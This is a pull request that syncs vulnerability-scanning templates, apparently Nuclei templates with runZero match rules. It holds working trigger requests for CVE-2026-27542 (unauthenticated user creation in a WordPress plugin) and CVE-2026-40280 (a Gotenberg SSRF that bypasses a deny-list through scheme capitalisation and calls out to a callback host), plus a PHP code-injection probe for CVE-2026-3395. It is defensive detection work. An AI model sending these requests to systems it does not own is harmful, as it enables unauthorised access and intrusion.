### PR TITLE
upstream sync (semantic): changes requiring review

### DIFF
--- a/http/cves/2024/CVE-2024-13985.yaml
+++ b/http/cves/2024/CVE-2024-13985.yaml
@@ -26,7 +26,7 @@ info:
     shodan-query: '"Dahua EIMS"'
     verified: true
     zoomeye-query: app="大华 EIMS"
-  tags: cve,cve2024,dahua,eims,kev,oast,pre-auth,rce,vkev
+  tags: cve,cve2024,dahua,eims,oast,pre-auth,rce,vkev
 http:
   - matchers:
       - part: interactsh_protocol

--- a/http/cves/2026/CVE-2026-27542.yaml
+++ b/http/cves/2026/CVE-2026-27542.yaml
@@ -1,0 +1,66 @@
+id: CVE-2026-27542
+info:
+  name: WooCommerce Wholesale Lead Capture <= 2.0.3.1 - Unauthenticated Privilege Escalation
+  author: theamanrawat,pdresearch
+  severity: critical
+  description: |
+    Rymera Web Co Pty Ltd. Woocommerce Wholesale Lead Capture <= 2.0.3.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.
+  impact: |
+    Attackers can escalate their privileges, potentially gaining unauthorized access to restricted functions or data.
+  remediation: |
+    Update to the latest version beyond 2.0.3.1.
+  reference:
+    - https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540-
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-wholesale-lead-capture
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-27542
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-27542
+    cwe-id: CWE-266
+  metadata:
+    runzero-match: any(each(service["http.bodies"]), {# matches "/wp-content/plugins/woocommerce-wholesale-lead-capture/"})
+    fofa-query: body="/wp-content/plugins/woocommerce-wholesale-lead-capture/"
+    framework: wordpress
+    max-request: 2
+    product: woocommerce-wholesale-lead-capture
+    publicwww-query: "/wp-content/plugins/woocommerce-wholesale-lead-capture/"
+    shodan-query: http.html:"/wp-content/plugins/woocommerce-wholesale-lead-capture/"
+    vendor: rymera-web-co
+    verified: true
+  tags: cve,cve2026,privesc,unauth,vkev,vuln,wholesale,woocommerce,wordpress,wp
+flow: http(1) && http(2)
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/woocommerce-wholesale-lead-capture/readme.txt"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "WooCommerce Wholesale Lead Capture")'
+          - 'compare_versions(version, "<= 2.0.3.1")'
+        condition: and
+        internal: true
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?m)Stable tag:\s+([0-9]+\.[0-9]+(?:\.[0-9]+(?:\.[0-9]+)*)?)'
+        internal: true
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded
+
+        action=wwlc_create_user
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - '!regex("^(-1|0)\\s*$", body) && len(body) > 2'
+          - 'contains_all(body, "wwlc_firstname", "wwlc_email")'
+        condition: and
+        # digest: 4a0a0047304502205935583c67e946336cf674aa5bc27dfc15afe1a5ecbb27ae6c137cc2416f27250221008261d33a6d4e2ed4ccdf5145f0cad1681ee92cb88c9e92f757df5d678ccc1776:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-3395.yaml
+++ b/http/cves/2026/CVE-2026-3395.yaml
@@ -28,7 +28,7 @@ info:
     shodan-query: MaxSite CMS
     vendor: max-3000
     verified: true
-  tags: cms,cve,cve2026,eval,kev,maxsite,rce,vkev
+  tags: cms,cve,cve2026,eval,maxsite,rce,vkev
 flow: http(1) && http(2)
 http:
   - matchers:
@@ -53,11 +53,10 @@ http:
           - 200
         type: status
     matchers-condition: and
-    raw:
-      - |
-        POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        X-Requested-With: XMLHttpRequest
+    raw: |
+      POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+      X-Requested-With: XMLHttpRequest
 
-        data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D
+      data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D

--- a/http/cves/2026/CVE-2026-40280.yaml
+++ b/http/cves/2026/CVE-2026-40280.yaml
@@ -1,0 +1,55 @@
+id: CVE-2026-40280
+info:
+  name: Gotenberg <= 8.30.1 - Server Side Request Forgery
+  author: str4k3r
+  severity: critical
+  description: |
+    Gotenberg is an API-based document conversion tool. In versions 8.30.1 and earlier, the default private-IP deny-lists for the --webhook-deny-list and --api-download-from-deny-list flags use a case-sensitive regular expression (^https?://) to match URL schemes. Because Go's net/url.Parse() normalizes the scheme to lowercase before establishing the outbound TCP connection, an attacker can bypass the deny-list by simply capitalizing part of the URL scheme (e.g., HTTP://, HTTPS://, or Http://). This allows unauthenticated requests to reach internal network services, including private IP ranges, loopback addresses, and cloud instance metadata endpoints such as HTTP://169.254.169.254/latest/meta-data.
+  impact: |
+    Unauthenticated SSRF via the downloadFrom feature allows reaching internal services, cloud metadata endpoints, and loopback addresses from the Gotenberg server.
+  remediation: This bypasses the same security control that was patched in CVE-2026-27018. This issue has been fixed in version 8.31.0.
+  reference:
+    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-5q7p-7jgv-ww56
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-40280
+    - https://github.com/gotenberg/gotenberg/commit/3f01ca18d3cc21375a1e2da4b5a3f261c8548e47
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
+    cvss-score: 9.3
+    cve-id: CVE-2026-40280
+    cwe-id: CWE-918
+  metadata:
+    runzero-match: any(each(service["http.bodies"]), {# matches "Gotenberg"})
+    max-request: 1
+    product: gotenberg
+    shodan-query: http.html:"Gotenberg"
+    vendor: thecodingmachine
+    verified: true
+  tags: cve,cve2026,downloadfrom,gotenberg,oast,ssrf
+http:
+  - raw:
+      - |
+        POST /forms/chromium/convert/html HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----gotenbergProbe
+
+        ------gotenbergProbe
+        Content-Disposition: form-data; name="files"; filename="index.html"
+        Content-Type: text/html
+
+        <html><body>ssrf-probe</body></html>
+        ------gotenbergProbe
+        Content-Disposition: form-data; name="downloadFrom"
+
+        [{"url":"HTTP://{{interactsh-url}}"}]
+        ------gotenbergProbe--
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+      - type: word
+        part: interactsh_request
+        words:
+          - "Gotenberg"
+        # digest: 4a0a0047304502206d92aeabee20c8453ecb7cc5ba557606830fdcb8eeffcf892a8267dd05b99b0f022100e3ab89b2e80b21a721627221605d2cac918a7c76ed4baf11bc9e105d0547c1e5:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-40280.yaml
+++ b/http/cves/2026/CVE-2026-40280.yaml
@@ -18,7 +18,7 @@ info:
     cve-id: CVE-2026-40280
     cwe-id: CWE-918
   metadata:
-    runzero-match: any(each(service["http.bodies"]), {# matches "Gotenberg"})
+    runzero-match: any(each(service["http.bodies"]), {# matches "Hey, Gotenberg has no UI"})
     max-request: 1
     product: gotenberg
     shodan-query: http.html:"Gotenberg"

--- a/http/exposed-panels/argocd-login.yaml
+++ b/http/exposed-panels/argocd-login.yaml
@@ -27,17 +27,29 @@ http:
     matchers:
       - condition: and
         dsl:
-          - contains(to_lower(header_1), 'grpc-metadata-content-type')
+          - contains(to_lower(body_1), '<title>argo cd</title>')
           - status_code_1 == 200
         type: dsl
       - condition: and
         dsl:
-          - contains(body_2, 'appLabelKey')
-          - contains(body_2, 'resourceOverrides')
+          - contains(to_lower(body_2), 'argocd control plane')
+          - status_code_2 == 200
+        type: dsl
+      - condition: and
+        dsl:
+          - contains(to_lower(body_3), 'argocd.argoproj.io')
+          - status_code_3 == 200
+        type: dsl
+      - condition: and
+        dsl:
+          - contains(to_lower(header_4), 'grpc-metadata-content-type')
+          - status_code_4 == 200
         type: dsl
     matchers-condition: or
     method: GET
     path:
-      - '{{BaseURL}}/api/version'
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/swagger.json'
       - '{{BaseURL}}/api/v1/settings'
+      - '{{BaseURL}}/api/version'
     stop-at-first-match: true

--- a/http/exposed-panels/shiori-panel.yaml
+++ b/http/exposed-panels/shiori-panel.yaml
@@ -1,0 +1,32 @@
+id: shiori-panel
+info:
+  name: Shiori Bookmark Manager - Detect
+  author: johnk3r
+  severity: info
+  description: |
+    Detected A Shiori bookmark manager panel.
+  reference:
+    - https://github.com/nicholasgasior/goshiori
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Shiori - Bookmarks Manager"})
+    fofa-query: title="Shiori - Bookmarks Manager"
+    max-request: 1
+    product: shiori
+    shodan-query: title:"Shiori - Bookmarks Manager"
+    vendor: shiori
+    verified: true
+  tags: detect,discovery,panel,shiori
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "shiori-token", "<title>Shiori - Bookmarks Manager</title>")'
+        condition: and
+        # digest: 4a0a00473045022027a31b332eef65badff010e6719f58a7266652c7dea46aef60901d3ad28676f3022100e10e8fbf094f76a71a6d3649834aa2e8c8e1049ae1f917d3bf90e09958824952:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
## Upstream Sync — Semantic Changes

> Targets the general branch. Review before merging.

### New templates — auto-generated match (3)

| Template | Severity | Notable tags | Note |
|---|---|---|---|
| `http/cves/2026/CVE-2026-27542.yaml` | 🔴 critical | vkev | — |
| `http/exposed-panels/shiori-panel.yaml` | ⚪ info | panel | — |
| `http/cves/2026/CVE-2026-40280.yaml` | 🔴 critical | — | — |

### Existing runZero templates — semantic changes (3)

| Template | Change |
|---|---|
| `http/cves/2024/CVE-2024-13985.yaml` | tags: -"kev" |
| `http/exposed-panels/argocd-login.yaml` | http: changed |
| `http/cves/2026/CVE-2026-3395.yaml` | http: changed |
| `http/cves/2026/CVE-2026-3395.yaml` | tags: -"kev" |

### Removed templates with active `runzero-match` (1)

| Template |
|---|
| `http/vulnerabilities/dahua/dahua-eims-rce.yaml` |

---

### ⚠️ Action items (4)

- [x] `http/cves/2026/CVE-2026-27542.yaml` — auto-generated `runzero-match` (vkev critical); please verify
- [x] `http/cves/2026/CVE-2026-40280.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/exposed-panels/shiori-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] ⚠️ `http/vulnerabilities/dahua/dahua-eims-rce.yaml` — removed upstream; had active `runzero-match`
